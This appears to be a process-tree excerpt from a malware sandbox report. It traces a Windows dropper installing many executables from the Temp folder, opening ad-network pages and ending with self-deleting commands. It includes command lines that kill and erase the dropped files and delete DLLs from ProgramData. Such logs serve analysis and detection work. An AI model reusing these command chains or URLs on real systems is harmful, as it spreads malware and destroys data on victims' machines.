C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:810⤵PID:2104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 /prefetch:810⤵PID:2632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4408 /prefetch:810⤵PID:2656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3232 /prefetch:810⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3364 /prefetch:810⤵PID:3672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 /prefetch:810⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:810⤵PID:1076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:810⤵PID:1848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:810⤵PID:3592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=940 /prefetch:810⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:810⤵PID:4544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:810⤵PID:3912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3524 /prefetch:810⤵PID:4912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3656 /prefetch:810⤵PID:2116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:810⤵PID:4692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:810⤵PID:5088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:810⤵PID:3476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:810⤵PID:3780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4660 /prefetch:810⤵PID:3700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3244 /prefetch:810⤵PID:4164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3256 /prefetch:810⤵PID:2136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:810⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:810⤵PID:4344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:810⤵PID:4944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3296 /prefetch:810⤵PID:2676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:810⤵PID:3688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4336 /prefetch:810⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:810⤵PID:4084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:110⤵PID:4124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:110⤵PID:3636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1052,6653343388392870042,2083976612910250964,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:110⤵PID:4944
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2472
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:2628
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:2752
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2752 -s 3928⤵
- Program crash
PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\is-4LR34.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4LR34.tmp\setup_2.tmp" /SL5="$201E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2260
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\is-RJ1P7.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJ1P7.tmp\setup_2.tmp" /SL5="$501E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:2760
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2252
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:1548
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 9566⤵
- Program crash
PID:2356
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
- Loads dropped DLL
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
PID:1244 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1244 -s 8046⤵
- Program crash
PID:3372
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Loads dropped DLL
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Loads dropped DLL
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
- Loads dropped DLL
PID:112 -
C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\is-QF35I.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-QF35I.tmp\Sun1966fb31dd5a07.tmp" /SL5="$5015C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSC54D6E33\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\is-D562K.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-D562K.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
PID:2180 -
C:\Program Files\Google\XPVRCPRWWN\ultramediaburner.exe"C:\Program Files\Google\XPVRCPRWWN\ultramediaburner.exe" /VERYSILENT8⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\is-OBN63.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-OBN63.tmp\ultramediaburner.tmp" /SL5="$102CC,281924,62464,C:\Program Files\Google\XPVRCPRWWN\ultramediaburner.exe" /VERYSILENT9⤵PID:3412
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:3532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b9-00234-68f-86baa-6003069989a57\Lificaenoci.exe"C:\Users\Admin\AppData\Local\Temp\b9-00234-68f-86baa-6003069989a57\Lificaenoci.exe"8⤵PID:3540
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:1484
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1484 CREDAT:275457 /prefetch:210⤵PID:3380
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1484 CREDAT:472093 /prefetch:210⤵PID:3092
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1484 CREDAT:472111 /prefetch:210⤵PID:692
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1484 CREDAT:1455129 /prefetch:210⤵PID:3032
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:4992
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:4300
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4300 CREDAT:275457 /prefetch:210⤵PID:4348
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:9184
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:4596
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4596 CREDAT:275457 /prefetch:210⤵PID:3756
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:4996
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:1360
-
-
-
C:\Users\Admin\AppData\Local\Temp\32-db766-2cc-b0083-922de33f1e377\Fequhelaqae.exe"C:\Users\Admin\AppData\Local\Temp\32-db766-2cc-b0083-922de33f1e377\Fequhelaqae.exe"8⤵PID:3724
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nuobxqpj.uhp\GcleanerEU.exe /eufive & exit9⤵PID:2504
-
C:\Users\Admin\AppData\Local\Temp\nuobxqpj.uhp\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nuobxqpj.uhp\GcleanerEU.exe /eufive10⤵PID:1852
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nuobxqpj.uhp\GcleanerEU.exe" & exit11⤵PID:4200
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hyhrnm54.hqi\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3400
-
C:\Users\Admin\AppData\Local\Temp\hyhrnm54.hqi\installer.exeC:\Users\Admin\AppData\Local\Temp\hyhrnm54.hqi\installer.exe /qn CAMPAIGN="654"10⤵PID:840
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hyhrnm54.hqi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hyhrnm54.hqi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632166863 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:5108
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kejtdduq.f2p\anyname.exe & exit9⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\kejtdduq.f2p\anyname.exeC:\Users\Admin\AppData\Local\Temp\kejtdduq.f2p\anyname.exe10⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4fz5asfk.fhv\gcleaner.exe /mixfive & exit9⤵PID:1812
-
C:\Users\Admin\AppData\Local\Temp\4fz5asfk.fhv\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\4fz5asfk.fhv\gcleaner.exe /mixfive10⤵PID:2012
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4fz5asfk.fhv\gcleaner.exe" & exit11⤵PID:4412
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2148 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\889F.exeC:\Users\Admin\AppData\Local\Temp\889F.exe1⤵PID:3304
-
C:\Users\Admin\AppData\Local\Temp\D27B.exeC:\Users\Admin\AppData\Local\Temp\D27B.exe1⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\12F5.exeC:\Users\Admin\AppData\Local\Temp\12F5.exe1⤵PID:644
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4188 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f1⤵
- Kills process with taskkill
PID:4276
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f1⤵
- Kills process with taskkill
PID:4464
-
C:\Users\Admin\AppData\Local\Temp\6E3F.exeC:\Users\Admin\AppData\Local\Temp\6E3F.exe1⤵PID:4544
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4868
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F17D7B2D063C14652345FDBA551B6CE C2⤵PID:2720
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D9FC03C2007086B781275903DD8105D92⤵PID:3932
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3124
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 10DB34F18ED0D029A453CF6EAA65240E M Global\MSI00002⤵PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\8CE7.exeC:\Users\Admin\AppData\Local\Temp\8CE7.exe1⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\72B4.exeC:\Users\Admin\AppData\Local\Temp\72B4.exe1⤵PID:4828
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 72B4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\72B4.exe" & del C:\ProgramData\*.dll & exit2⤵PID:3408
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 72B4.exe /f3⤵
- Kills process with taskkill
PID:4092
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:3816
-
-
-
C:\ProgramData\XS8MWKITC7SO3S3Y.exe"C:\ProgramData\XS8MWKITC7SO3S3Y.exe"2⤵PID:2384
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B1D85C4D-E48F-46A1-B579-F9F6CBC35CDA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4976
-
C:\Users\Admin\AppData\Roaming\duswdagC:\Users\Admin\AppData\Roaming\duswdag2⤵PID:4500
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C00AF4F9-E12F-48A0-B889-DCD2595C3DD3} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:4740
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:4428
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:636
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:4748
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:3812
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:2320
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:1232
-